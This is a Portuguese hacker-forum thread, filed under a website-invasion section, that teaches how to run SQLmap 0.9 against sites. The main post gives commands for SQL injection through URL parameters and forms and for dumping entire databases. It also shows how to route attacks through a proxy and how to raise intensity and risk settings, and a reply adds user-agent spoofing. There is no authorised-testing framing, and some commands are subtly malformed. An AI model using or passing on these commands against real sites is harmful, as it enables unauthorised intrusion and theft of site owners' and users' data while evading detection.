21/06/13

Bem-vindo(a) ao Frum do Guia do Hacker.

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

Pesquisar:

Registrar

Como utilizar o Frum

Membros

Calendrio

Postados Hoje

Pesquisar

Usurio Usurio Senha

Lembrar? Logar

Frum do Guia do Hacker Segurana Digital e Hacking rea Hacker Defacer SQLmap 0.9 - como usar [Dica] Defacer rea destinada a invaso de sites.

Tpicos Similares
Tpico Tpico Iniciado Por Frum Respostas ltima Mensagem

Tutorial Como Usar o ProRat Dvida Como usar um proxy? Tumblr.com O que ? Como Usar? Dica Como usar seu iPod como disco removvel Tutorial como usar o IRC

lucaslms13 Tiagui99 Compton Dox.y H@<k3R-()

Matrias/Tutoriais/Dicas e Dvidas Matrias/Tutoriais/Dicas e Dvidas Tumblr Outros Dispositivos de Armazenamento Irc

19 7 0 2 5

28-07-2011 18:58 26-05-2011 19:26 24-04-2011 15:17 23-06-2010 12:33 15-10-2009 16:24

SQLmap 0.9 - como usar [Dica] 26-08-2011, 21:58

Compartilhar |

Ferramentas do Tpico

Modos de Exibio

#1

leohotluz
Membro

0 SQLmap 0.9 - como usar [Dica] Como fazer funcionar: Na vez que conheci esse programinha bsico, tive dificuldade pra execut-lo no Windows, ento vai essa dica. SQLmap 0.9 roda no windows e linux com python instalado (ateno usem python 2.6 seno no funciona) caso tenha python posterior, instale o 2.6 em outra pasta, e rode-o com o parmetro contendo o diretrio do sqlmap.py, ex: no terminal: c:\python26\python.exe "c:\sqlmap\sqlmap.py" (caso tenha algum python mais novo instalado). Caso s tenha o python 2.6 instalado, s joga o .py direto no terminal que funciona, ex: "c:\sqlmap\sqlmap.py" Use -h para ver demais comandos, ex: "c:\sqlmap\sqlmap.py" -h ou: c:\python26\python.exe "c:\sqlmap\sqlmap.py" (caso tenha vrios pythons instalados). Fazer Injection em varivel de link (GET):

Status: Membro Registrado em: Jul 2011 Localizao: pgua Posts: 84

"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --current-db --tables dump-all Isso ja extrai tudo que for possvel da database, mais prtico assim. Fazer Injeo em formulrio (POST): "c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --forms --current-db --tables dump-all o parmetro "--forms" vai fazer o SQLmap escnear a pgina html e procurar os formulrios contidos nela (podem ser formulrios de busca, enfim, todo tipo de input, combobox, checkbox, list, radio, text). o SQLmap vai te perguntar qual formulrio voc deseja usar (caso exista mais de um na mesma pgina). A galera esquece que d pra fazer injection em radio buttons, checkbox e etc. Para usar proxy: Usa-se o parmetro ' --proxy="http://xxx.xxx.xxx.xxx:xx" ' para ativar o seu uso, ex: "c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --proxy="http://200.156.35.2:3128" -current-db --tables dump-all Para aumentar poder de injeo:

Agradeceu: 37 Agradecido 41 Vezes em 19 Posts

forum.guiadohacker.com.br/showthread.php?t=17295

1/7

21/06/13

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

Use os parmetros "--level=x" onde x igual a um numero inteiro de intensidade que pode ser de 1 a 5, e 5 maior poder, 1 menor poder. Use o parmetro "--risk=x" (onde x igual a um numero de 1 a 3) para definir maior apelao, que torna mais arriscado-claro, ex: "c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --level=5 --risk=3--current-db --tables dump-all Tela do programa:
Esta imagem foi redimensionada. Clique nesta barra para v er a imagem completa. A imagem original de tamanho 669x172.

Resultados: Os resultados da varredura ficaro na pasta ./output/nome_do_site_injetado/ fonte: eu mesmo Para saber outros detalhes sobre o sql map, tem o post do prT's: [Somente usurios registrados podem ver os Links. Clique aqui para se REGISTRAR] [Somente usurios registrados podem ver os Links. Clique aqui para se REGISTRAR] ltima edio por John; 28-08-2011 s 11:19.. Motivo: Adicionado link

Os 8 Usurios Agradeceram (a): leohotluz por gostarem desta postagem:

26-08-2011, 23:32

coiote (27-08-2011), fopen (02-01-2012), gaaramaster (31-01-2013), John (28-08-2011), LUCASVITORINO (16-04-2012), sabbath1989 (11-04-2013), v1s1t0r (06-04-2012), xibiows (28-08-2011)

#2

FalcoOMxD
Estudante de Engenharia Social

Opa muito bom.. vo analizar aki.. vlw Obrigado por compartilhar ! FalcoOmxD __________________

Status: Estudante de Engenharia Social Registrado em: Apr 2011 Localizao: Pico-do-Imalaia

"stay hungry stay foolish" - Um perfeito crculo virtuoso, talvez utpico, mas alcanvel. Steve Jobs

forum.guiadohacker.com.br/showthread.php?t=17295

2/7

21/06/13
Posts: 204

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

Agradeceu: 145 Agradecido 118 Vezes em 74 Posts

28-08-2011, 09:49

#3

xibiows
Membro

parabens man, vo testa ake, ja q pra mim usa sqlmap emulava backtrack IAOeiea Thankzzz kara

Status: Membro Registrado em: Aug 2011 Localizao: Bat Caverna Posts: 3

Agradeceu: 10 Agradecido 1 Vez em 1 Post

28-08-2011, 11:21

#4

John
Membro Participativo

Bom tutorial Obrigado por compartilhar conosco

forum.guiadohacker.com.br/showthread.php?t=17295

3/7

21/06/13

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

Status: Membro Participativo Registrado em: Oct 2009 Localizao: N/A Posts: 497

Agradeceu: 947 Agradecido 314 Vezes em 173 Posts

02-01-2012, 19:48

#5

live.mkt
Membro

obrigado, muito bom

Status: Membro Registrado em: Dec 2011 Localizao: So Paulo Posts: 6

Agradeceu: 0 Agradecido 1 Vez em 1 Post

02-01-2012, 21:37

#6

fopen
Membro

Muito bom podeia ter colocado tambem como mudar o user agent, desta forma por exemplo: ./sqlmap -u "http://www.sitevul.com/noticia.php?id=202" --user-agent="Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0"

forum.guiadohacker.com.br/showthread.php?t=17295

4/7

21/06/13

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

Status: Membro Registrado em: Nov 2011 Localizao: U.S.A Posts: 207

Agradeceu: 102 Agradecido 151 Vezes em 62 Posts

03-07-2012, 13:26

#7

Movi3r
Membro

O meu est dando um erro. 1- Quando eu executo aparece uma mensagem tipo essa: " Enter to continue " , e quando eu clico enter ele encerra.

Status: Membro Registrado em: Jun 2012 Localizao: Piumhi-MG Posts: 8

Agradeceu: 0 Agradecido 0 Vezes em 0 Posts

forum.guiadohacker.com.br/showthread.php?t=17295

5/7

21/06/13

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

03-07-2012, 13:53

#8

Movi3r
Membro

Bom tutorial, Obrigado por compartilhar.

Status: Membro Registrado em: Jun 2012 Localizao: Piumhi-MG Posts: 8

Agradeceu: 0 Agradecido 0 Vezes em 0 Posts

Tags

form, injeo em post, sqlmap

Tpico Anterior | Prximo Tpico

Regras para Posts

Voc Voc Voc Voc

no no no no

pode pode pode pode

postar novos tpicos postar respostas postar anexos editar seus posts

Cdigo Smiles: Cdigo Cdigo

BB Sim Sim [IMG] Sim HTML No

Ir para... Defacer Ir

Regras do Frum

Horrios baseados na GMT -3. Agora so 17:55.

forum.guiadohacker.com.br/showthread.php?t=17295

6/7

21/06/13

SQLmap 0.9 - como usar [Dica] - Frum do Guia do Hacker

Fale Conosco - Frum Hacker do Guia do Hacker - Arquivo - Incio

Registrar

Como utilizar o Frum

Membros

Calendrio

Pesquisar

Postados Hoje

Marcar Fruns Como Lidos

Guia do Hacker Powered by vBulletin Copyright - 2013 vBulletin Solutions, Inc.

forum.guiadohacker.com.br/showthread.php?t=17295

7/7